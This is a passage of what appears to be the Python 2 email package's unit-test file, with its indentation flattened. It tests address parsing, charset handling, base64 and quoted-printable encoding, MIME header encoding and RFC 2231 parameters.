utils.formataddr(('Arthur \Backslash\ Foobar', '[email protected]')),
r'"Arthur \\Backslash\\ Foobar" <[email protected]>')
a = r'Arthur \Backslash\ Foobar'
b = '[email protected]'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_name_with_dot(self):
x = 'John X. Doe <[email protected]>'
y = '"John X. Doe" <[email protected]>'
a, b = ('John X. Doe', '[email protected]')
self.assertEqual(utils.parseaddr(x), (a, b))
self.assertEqual(utils.parseaddr(y), (a, b))
# formataddr() quotes the name if there's a dot in it
self.assertEqual(utils.formataddr((a, b)), y)
def test_multiline_from_comment(self):
x = """\
Foo
\tBar <[email protected]>"""
self.assertEqual(utils.parseaddr(x), ('Foo Bar', '[email protected]'))
def test_quote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly; Person', '[email protected]')),
r'"A Silly; Person" <[email protected]>')
def test_fix_eols(self):
eq = self.assertEqual
eq(utils.fix_eols('hello'), 'hello')
eq(utils.fix_eols('hello\n'), 'hello\r\n')
eq(utils.fix_eols('hello\r'), 'hello\r\n')
eq(utils.fix_eols('hello\r\n'), 'hello\r\n')
eq(utils.fix_eols('hello\n\r'), 'hello\r\n\r\n')
def test_charset_richcomparisons(self):
eq = self.assertEqual
ne = self.assertNotEqual
cset1 = Charset()
cset2 = Charset()
eq(cset1, 'us-ascii')
eq(cset1, 'US-ASCII')
eq(cset1, 'Us-AsCiI')
eq('us-ascii', cset1)
eq('US-ASCII', cset1)
eq('Us-AsCiI', cset1)
ne(cset1, 'usascii')
ne(cset1, 'USASCII')
ne(cset1, 'UsAsCiI')
ne('usascii', cset1)
ne('USASCII', cset1)
ne('UsAsCiI', cset1)
eq(cset1, cset2)
eq(cset2, cset1)
def test_getaddresses(self):
eq = self.assertEqual
eq(utils.getaddresses(['[email protected] (Al Person)',
'Bud Person <[email protected]>']),
[('Al Person', '[email protected]'),
('Bud Person', '[email protected]')])
def test_getaddresses_nasty(self):
eq = self.assertEqual
eq(utils.getaddresses(['foo: ;']), [('', '')])
eq(utils.getaddresses(
['[]*-- =~$']),
[('', ''), ('', ''), ('', '*--')])
eq(utils.getaddresses(
['foo: ;', '"Jason R. Mastaler" <[email protected]>']),
[('', ''), ('Jason R. Mastaler', '[email protected]')])
def test_getaddresses_embedded_comment(self):
"""Test proper handling of a nested comment"""
eq = self.assertEqual
addrs = utils.getaddresses(['User ((nested comment)) <[email protected]>'])
eq(addrs[0][1], '[email protected]')
def test_utils_quote_unquote(self):
eq = self.assertEqual
msg = Message()
msg.add_header('content-disposition', 'attachment',
filename='foo\\wacky"name')
eq(msg.get_filename(), 'foo\\wacky"name')
def test_get_body_encoding_with_bogus_charset(self):
charset = Charset('not a charset')
self.assertEqual(charset.get_body_encoding(), 'base64')
def test_get_body_encoding_with_uppercase_charset(self):
eq = self.assertEqual
msg = Message()
msg['Content-Type'] = 'text/plain; charset=UTF-8'
eq(msg['content-type'], 'text/plain; charset=UTF-8')
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'utf-8')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), 'base64')
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'aGVsbG8gd29ybGQ=\n')
eq(msg.get_payload(decode=True), 'hello world')
eq(msg['content-transfer-encoding'], 'base64')
# Try another one
msg = Message()
msg['Content-Type'] = 'text/plain; charset="US-ASCII"'
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'us-ascii')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), encoders.encode_7or8bit)
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'hello world')
eq(msg['content-transfer-encoding'], '7bit')
def test_charsets_case_insensitive(self):
lc = Charset('us-ascii')
uc = Charset('US-ASCII')
self.assertEqual(lc.get_body_encoding(), uc.get_body_encoding())
def test_partial_falls_inside_message_delivery_status(self):
eq = self.ndiffAssertEqual
# The Parser interface provides chunks of data to FeedParser in 8192
# byte gulps. SF bug #1076485 found one of those chunks inside
# message/delivery-status header block, which triggered an
# unreadline() of NeedMoreData.
msg = self._msgobj('msg_43.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/report
text/plain
message/delivery-status
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/rfc822-headers
""")
# Test the iterator/generators
class TestIterators(TestEmailBase):
def test_body_line_iterator(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
# First a simple non-multipart message
msg = self._msgobj('msg_01.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 6)
neq(EMPTYSTRING.join(lines), msg.get_payload())
# Now a more complicated multipart
msg = self._msgobj('msg_02.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 43)
fp = openfile('msg_19.txt')
try:
neq(EMPTYSTRING.join(lines), fp.read())
finally:
fp.close()
def test_typed_subpart_iterator(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
it = iterators.typed_subpart_iterator(msg, 'text')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 2)
eq(EMPTYSTRING.join(lines), """\
a simple kind of mirror
to reflect upon our own
a simple kind of mirror
to reflect upon our own
""")
def test_typed_subpart_iterator_default_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_03.txt')
it = iterators.typed_subpart_iterator(msg, 'text', 'plain')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 1)
eq(EMPTYSTRING.join(lines), """\
Hi,
Do you like this message?
-Me
""")
class TestParsers(TestEmailBase):
def test_header_parser(self):
eq = self.assertEqual
# Parse only the headers of a complex multipart MIME document
fp = openfile('msg_02.txt')
try:
msg = HeaderParser().parse(fp)
finally:
fp.close()
eq(msg['from'], '[email protected]')
eq(msg['to'], '[email protected]')
eq(msg.get_content_type(), 'multipart/mixed')
self.assertFalse(msg.is_multipart())
self.assertIsInstance(msg.get_payload(), str)
def test_whitespace_continuation(self):
eq = self.assertEqual
# This message contains a line after the Subject: header that has only
# whitespace, but it is not empty!
msg = email.message_from_string("""\
From: [email protected]
To: [email protected]
Subject: the next line has a space on it
\x20
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_whitespace_continuation_last_header(self):
eq = self.assertEqual
# Like the previous test, but the subject line is the last
# header.
msg = email.message_from_string("""\
From: [email protected]
To: [email protected]
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Subject: the next line has a space on it
\x20
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_crlf_separation(self):
eq = self.assertEqual
fp = openfile('msg_26.txt', mode='rb')
try:
msg = Parser().parse(fp)
finally:
fp.close()
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'text/plain')
eq(part1.get_payload(), 'Simple email with attachment.\r\n\r\n')
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'application/riscos')
def test_multipart_digest_with_extra_mime_headers(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
# Structure is:
# multipart/digest
# message/rfc822
# text/plain
# message/rfc822
# text/plain
eq(msg.is_multipart(), 1)
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'message/rfc822')
eq(part1.is_multipart(), 1)
eq(len(part1.get_payload()), 1)
part1a = part1.get_payload(0)
eq(part1a.is_multipart(), 0)
eq(part1a.get_content_type(), 'text/plain')
neq(part1a.get_payload(), 'message 1\n')
# next message/rfc822
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'message/rfc822')
eq(part2.is_multipart(), 1)
eq(len(part2.get_payload()), 1)
part2a = part2.get_payload(0)
eq(part2a.is_multipart(), 0)
eq(part2a.get_content_type(), 'text/plain')
neq(part2a.get_payload(), 'message 2\n')
def test_three_lines(self):
# A bug report by Andrew McNamara
lines = ['From: Andrew Person <[email protected]',
'Subject: Test',
'Date: Tue, 20 Aug 2002 16:43:45 +1000']
msg = email.message_from_string(NL.join(lines))
self.assertEqual(msg['date'], 'Tue, 20 Aug 2002 16:43:45 +1000')
def test_strip_line_feed_and_carriage_return_in_headers(self):
eq = self.assertEqual
# For [ 1002475 ] email message parser doesn't handle \r\n correctly
value1 = 'text'
value2 = 'more text'
m = 'Header: %s\r\nNext-Header: %s\r\n\r\nBody\r\n\r\n' % (
value1, value2)
msg = email.message_from_string(m)
eq(msg.get('Header'), value1)
eq(msg.get('Next-Header'), value2)
def test_rfc2822_header_syntax(self):
eq = self.assertEqual
m = '>From: foo\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 3)
keys = msg.keys()
keys.sort()
eq(keys, ['!"#QUX;~', '>From', 'From'])
eq(msg.get_payload(), 'body')
def test_rfc2822_space_not_allowed_in_header(self):
eq = self.assertEqual
m = '>From [email protected] 11:25:53\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 0)
def test_rfc2822_one_character_header(self):
eq = self.assertEqual
m = 'A: first header\nB: second header\nCC: third header\n\nbody'
msg = email.message_from_string(m)
headers = msg.keys()
headers.sort()
eq(headers, ['A', 'B', 'CC'])
eq(msg.get_payload(), 'body')
class TestBase64(unittest.TestCase):
def test_len(self):
eq = self.assertEqual
eq(base64mime.base64_len('hello'),
len(base64mime.encode('hello', eol='')))
for size in range(15):
if size == 0 : bsize = 0
elif size <= 3 : bsize = 4
elif size <= 6 : bsize = 8
elif size <= 9 : bsize = 12
elif size <= 12: bsize = 16
else : bsize = 20
eq(base64mime.base64_len('x'*size), bsize)
def test_decode(self):
eq = self.assertEqual
eq(base64mime.decode(''), '')
eq(base64mime.decode('aGVsbG8='), 'hello')
eq(base64mime.decode('aGVsbG8=', 'X'), 'hello')
eq(base64mime.decode('aGVsbG8NCndvcmxk\n', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(base64mime.encode(''), '')
eq(base64mime.encode('hello'), 'aGVsbG8=\n')
# Test the binary flag
eq(base64mime.encode('hello\n'), 'aGVsbG8K\n')
eq(base64mime.encode('hello\n', 0), 'aGVsbG8NCg==\n')
# Test the maxlinelen arg
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IA==
""")
# Test the eol argument
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IA==\r
""")
def test_header_encode(self):
eq = self.assertEqual
he = base64mime.header_encode
eq(he('hello'), '=?iso-8859-1?b?aGVsbG8=?=')
eq(he('hello\nworld'), '=?iso-8859-1?b?aGVsbG8NCndvcmxk?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?b?aGVsbG8=?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True),
'=?iso-8859-1?b?aGVsbG8Kd29ybGQ=?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=\r
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=\r
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=\r
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=\r
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=\r
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
class TestQuopri(unittest.TestCase):
def setUp(self):
self.hlit = [chr(x) for x in range(ord('a'), ord('z')+1)] + \
[chr(x) for x in range(ord('A'), ord('Z')+1)] + \
[chr(x) for x in range(ord('0'), ord('9')+1)] + \
['!', '*', '+', '-', '/', ' ']
self.hnon = [chr(x) for x in range(256) if chr(x) not in self.hlit]
assert len(self.hlit) + len(self.hnon) == 256
self.blit = [chr(x) for x in range(ord(' '), ord('~')+1)] + ['\t']
self.blit.remove('=')
self.bnon = [chr(x) for x in range(256) if chr(x) not in self.blit]
assert len(self.blit) + len(self.bnon) == 256
def test_header_quopri_check(self):
for c in self.hlit:
self.assertFalse(quoprimime.header_quopri_check(c))
for c in self.hnon:
self.assertTrue(quoprimime.header_quopri_check(c))
def test_body_quopri_check(self):
for c in self.blit:
self.assertFalse(quoprimime.body_quopri_check(c))
for c in self.bnon:
self.assertTrue(quoprimime.body_quopri_check(c))
def test_header_quopri_len(self):
eq = self.assertEqual
hql = quoprimime.header_quopri_len
enc = quoprimime.header_encode
for s in ('hello', 'h@e@l@l@o@'):
# Empty charset and no line-endings. 7 == RFC chrome
eq(hql(s), len(enc(s, charset='', eol=''))-7)
for c in self.hlit:
eq(hql(c), 1)
for c in self.hnon:
eq(hql(c), 3)
def test_body_quopri_len(self):
eq = self.assertEqual
bql = quoprimime.body_quopri_len
for c in self.blit:
eq(bql(c), 1)
for c in self.bnon:
eq(bql(c), 3)
def test_quote_unquote_idempotent(self):
for x in range(256):
c = chr(x)
self.assertEqual(quoprimime.unquote(quoprimime.quote(c)), c)
def test_header_encode(self):
eq = self.assertEqual
he = quoprimime.header_encode
eq(he('hello'), '=?iso-8859-1?q?hello?=')
eq(he('hello\nworld'), '=?iso-8859-1?q?hello=0D=0Aworld?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?q?hello?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True), '=?iso-8859-1?q?hello=0Aworld?=')
# Test a non-ASCII character
eq(he('hello\xc7there'), '=?iso-8859-1?q?hello=C7there?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=\r
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=\r
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=\r
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=\r
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
def test_decode(self):
eq = self.assertEqual
eq(quoprimime.decode(''), '')
eq(quoprimime.decode('hello'), 'hello')
eq(quoprimime.decode('hello', 'X'), 'hello')
eq(quoprimime.decode('hello\nworld', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(quoprimime.encode(''), '')
eq(quoprimime.encode('hello'), 'hello')
# Test the binary flag
eq(quoprimime.encode('hello\r\nworld'), 'hello\nworld')
eq(quoprimime.encode('hello\r\nworld', 0), 'hello\nworld')
# Test the maxlinelen arg
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=
x xxxx xxxx xxxx xxxx=20""")
# Test the eol argument
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=\r
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=\r
x xxxx xxxx xxxx xxxx=20""")
eq(quoprimime.encode("""\
one line
two line"""), """\
one line
two line""")
# Test the Charset class
class TestCharset(unittest.TestCase):
def tearDown(self):
from email import charset as CharsetModule
try:
del CharsetModule.CHARSETS['fake']
except KeyError:
pass
def test_idempotent(self):
eq = self.assertEqual
# Make sure us-ascii = no Unicode conversion
c = Charset('us-ascii')
s = 'Hello World!'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
# test 8-bit idempotency with us-ascii
s = '\xa4\xa2\xa4\xa4\xa4\xa6\xa4\xa8\xa4\xaa'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
def test_body_encode(self):
eq = self.assertEqual
# Try a charset with QP body encoding
c = Charset('iso-8859-1')
eq('hello w=F6rld', c.body_encode('hello w\xf6rld'))
# Try a charset with Base64 body encoding
c = Charset('utf-8')
eq('aGVsbG8gd29ybGQ=\n', c.body_encode('hello world'))
# Try a charset with None body encoding
c = Charset('us-ascii')
eq('hello world', c.body_encode('hello world'))
# Try the convert argument, where input codec != output codec
c = Charset('euc-jp')
# With apologies to Tokio Kikuchi ;)
try:
eq('\x1b$B5FCO;~IW\x1b(B',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7'))
eq('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7', False))
except LookupError:
# We probably don't have the Japanese codecs installed
pass
# Testing SF bug #625509, which we have to fake, since there are no
# built-in encodings where the header encoding is QP but the body
# encoding is not.
from email import charset as CharsetModule
CharsetModule.add_charset('fake', CharsetModule.QP, None)
c = Charset('fake')
eq('hello w\xf6rld', c.body_encode('hello w\xf6rld'))
def test_unicode_charset_name(self):
charset = Charset(u'us-ascii')
self.assertEqual(str(charset), 'us-ascii')
self.assertRaises(errors.CharsetError, Charset, 'asc\xffii')
# Test multilingual MIME headers.
class TestHeader(TestEmailBase):
def test_simple(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append(' Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_simple_surprise(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append('Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_header_needs_no_decoding(self):
h = 'no decoding needed'
self.assertEqual(decode_header(h), [(h, None)])
def test_long(self):
h = Header("I am the very model of a modern Major-General; I've information vegetable, animal, and mineral; I know the kings of England, and I quote the fights historical from Marathon to Waterloo, in order categorical; I'm very well acquainted, too, with matters mathematical; I understand equations, both the simple and quadratical; about binomial theorem I'm teeming with a lot o' news, with many cheerful facts about the square of the hypotenuse.",
maxlinelen=76)
for l in h.encode(splitchars=' ').split('\n '):
self.assertLessEqual(len(l), 76)
def test_multilingual(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g)
h.append(cz_head, cz)
h.append(utf8_head, utf8)
enc = h.encode()
eq(enc, """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerderband_ko?=
=?iso-8859-1?q?mfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndischen_Wan?=
=?iso-8859-1?q?dgem=E4lden_vorbei=2C_gegen_die_rotierenden_Klingen_bef=F6?=
=?iso-8859-1?q?rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_metropole_se_hroutily?=
=?iso-8859-2?q?_pod_tlakem_jejich_d=F9vtipu=2E=2E_?= =?utf-8?b?5q2j56K6?=
=?utf-8?b?44Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE44G+44Gb44KT44CC?=
=?utf-8?b?5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB44GC44Go44Gv44Gn?=
=?utf-8?b?44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CMV2VubiBpc3QgZGFz?=
=?utf-8?q?_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das_Oder_die_Fl?=
=?utf-8?b?aXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBo+OBpuOBhOOBvuOBmQ==?=
=?utf-8?b?44CC?=""")
eq(decode_header(enc),
[(g_head, "iso-8859-1"), (cz_head, "iso-8859-2"),
(utf8_head, "utf-8")])
ustr = unicode(h)
eq(ustr.encode('utf-8'),
'Die Mieter treten hier ein werden mit einem Foerderband '
'komfortabel den Korridor entlang, an s\xc3\xbcdl\xc3\xbcndischen '
'Wandgem\xc3\xa4lden vorbei, gegen die rotierenden Klingen '
'bef\xc3\xb6rdert. Finan\xc4\x8dni metropole se hroutily pod '
'tlakem jejich d\xc5\xafvtipu.. \xe6\xad\xa3\xe7\xa2\xba\xe3\x81'
'\xab\xe8\xa8\x80\xe3\x81\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3'
'\xe3\x81\xaf\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3'
'\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8\xaa\x9e'
'\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\xe3\x81\x82\xe3'
'\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81\x9f\xe3\x82\x89\xe3\x82'
'\x81\xe3\x81\xa7\xe3\x81\x99\xe3\x80\x82\xe5\xae\x9f\xe9\x9a\x9b'
'\xe3\x81\xab\xe3\x81\xaf\xe3\x80\x8cWenn ist das Nunstuck git '
'und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt '
'gersput.\xe3\x80\x8d\xe3\x81\xa8\xe8\xa8\x80\xe3\x81\xa3\xe3\x81'
'\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80\x82')
# Test make_header()
newh = make_header(decode_header(enc))
eq(newh, enc)
def test_header_ctor_default_args(self):
eq = self.ndiffAssertEqual
h = Header()
eq(h, '')
h.append('foo', Charset('iso-8859-1'))
eq(h, '=?iso-8859-1?q?foo?=')
def test_explicit_maxlinelen(self):
eq = self.ndiffAssertEqual
hstr = 'A very long line that must get split to something other than at the 76th character boundary to test the non-default behavior'
h = Header(hstr)
eq(h.encode(), '''\
A very long line that must get split to something other than at the 76th
character boundary to test the non-default behavior''')
h = Header(hstr, header_name='Subject')
eq(h.encode(), '''\
A very long line that must get split to something other than at the
76th character boundary to test the non-default behavior''')
h = Header(hstr, maxlinelen=1024, header_name='Subject')
eq(h.encode(), hstr)
def test_us_ascii_header(self):
eq = self.assertEqual
s = 'hello'
x = decode_header(s)
eq(x, [('hello', None)])
h = make_header(x)
eq(s, h.encode())
def test_string_charset(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
eq(h, '=?iso-8859-1?q?hello?=')
## def test_unicode_error(self):
## raises = self.assertRaises
## raises(UnicodeError, Header, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, '[P\xf6stal]', 'us-ascii')
## h = Header()
## raises(UnicodeError, h.append, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, h.append, '[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, u'\u83ca\u5730\u6642\u592b', 'iso-8859-1')
def test_utf8_shortest(self):
eq = self.assertEqual
h = Header(u'p\xf6stal', 'utf-8')
eq(h.encode(), '=?utf-8?q?p=C3=B6stal?=')
h = Header(u'\u83ca\u5730\u6642\u592b', 'utf-8')
eq(h.encode(), '=?utf-8?b?6I+K5Zyw5pmC5aSr?=')
def test_bad_8bit_header(self):
raises = self.assertRaises
eq = self.assertEqual
x = 'Ynwp4dUEbay Auction Semiar- No Charge \x96 Earn Big'
raises(UnicodeError, Header, x)
h = Header()
raises(UnicodeError, h.append, x)
eq(str(Header(x, errors='replace')), x)
h.append(x, errors='replace')
eq(str(h), x)
def test_encoded_adjacent_nonencoded(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
h.append('world')
s = h.encode()
eq(s, '=?iso-8859-1?q?hello?= world')
h = make_header(decode_header(s))
eq(h.encode(), s)
def test_whitespace_eater(self):
eq = self.assertEqual
s = 'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztk=?= =?koi8-r?q?=CA?= zz.'
parts = decode_header(s)
eq(parts, [('Subject:', None), ('\xf0\xd2\xcf\xd7\xc5\xd2\xcb\xc1 \xce\xc1 \xc6\xc9\xce\xc1\xcc\xd8\xce\xd9\xca', 'koi8-r'), ('zz.', None)])
hdr = make_header(parts)
eq(hdr.encode(),
'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztnK?= zz.')
def test_broken_base64_header(self):
raises = self.assertRaises
s = 'Subject: =?EUC-KR?B?CSixpLDtKSC/7Liuvsax4iC6uLmwMcijIKHaILzSwd/H0SC8+LCjwLsgv7W/+Mj3I ?='
raises(errors.HeaderParseError, decode_header, s)
# Test RFC 2231 header parameters (en/de)coding
class TestRFC2231(TestEmailBase):
def test_get_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_29.txt')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
eq(msg.get_param('title', unquote=False),
('us-ascii', 'en', '"This is even more ***fun*** isn\'t it!"'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii')
eq(msg.get_param('title'),
('us-ascii', '', 'This is even more ***fun*** isn\'t it!'))
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
msg = self._msgobj('msg_01.txt')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
self.ndiffAssertEqual(msg.as_string(), """\
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: by mail.zzz.org (Postfix, from userid 889)
id 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <[email protected]>
From: [email protected] (John X. Doe)
To: [email protected]
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset=us-ascii;
title*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_del_param(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_01.txt')
msg.set_param('foo', 'bar', charset='us-ascii', language='en')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
msg.del_param('foo', header='Content-Type')
eq(msg.as_string(), """\
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: by mail.zzz.org (Postfix, from userid 889)
id 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <[email protected]>
From: [email protected] (John X. Doe)
To: [email protected]
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset="us-ascii";
title*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_rfc2231_get_content_charset(self):
eq = self.assertEqual
msg = self._msgobj('msg_32.txt')
eq(msg.get_content_charset(), 'us-ascii')
